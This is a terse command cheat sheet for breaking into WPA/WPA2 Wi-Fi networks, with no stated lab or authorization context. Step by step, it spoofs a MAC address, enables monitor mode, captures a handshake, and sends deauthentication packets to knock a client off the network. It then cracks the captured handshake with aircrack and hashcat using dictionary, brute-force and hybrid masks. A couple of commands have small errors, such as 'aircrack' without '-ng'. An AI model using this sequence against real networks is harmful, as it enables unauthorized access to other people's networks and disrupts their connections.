Mac changer:
sudo macchanger --mac=12:34:56:78:9a:bc wlan0
Start monitor mode:
sudo airmon-ng start wlan0
Get bssid:
sudo airodump-ng wlan0mon
Dump handshake packet (channel = 7, bssid=aa:bb:cc:dd:ee):
sudo airodump-ng -c 7 --bssid aa:bb:cc:dd:ee:ff -w test wlan0mon
Deauth target:
sudo aireplay-ng -0 10 -a aa:bb:cc:dd:ee:ff -c 11:22:33:44:55:66 wlan0mon
Aircrack by dictionary:
sudo aircrack -w ~/pw/pw_list.txt ~/test.cap
Convert to hc22000 format
https://hashcat.net/cap2hashcat/
Hashcat by dictionary:
hashcat -m 22000 test.hc22000 ~/pw/pw_list.txt
Hashcat by brute force:
For example, 8 lowercase character,
increment rule:-i --increment-min 8 --increment-max 12
hashcat -a3 -m 22000 -i test.hc22000 ?l?l?l?l?l?l?l?l
Hashcat by custom pattern mixed with dictionary:
hashcat -m 22000 -i -a 6 test.hc22000 ~/pw/pw_list.txt ?d?d?d?d
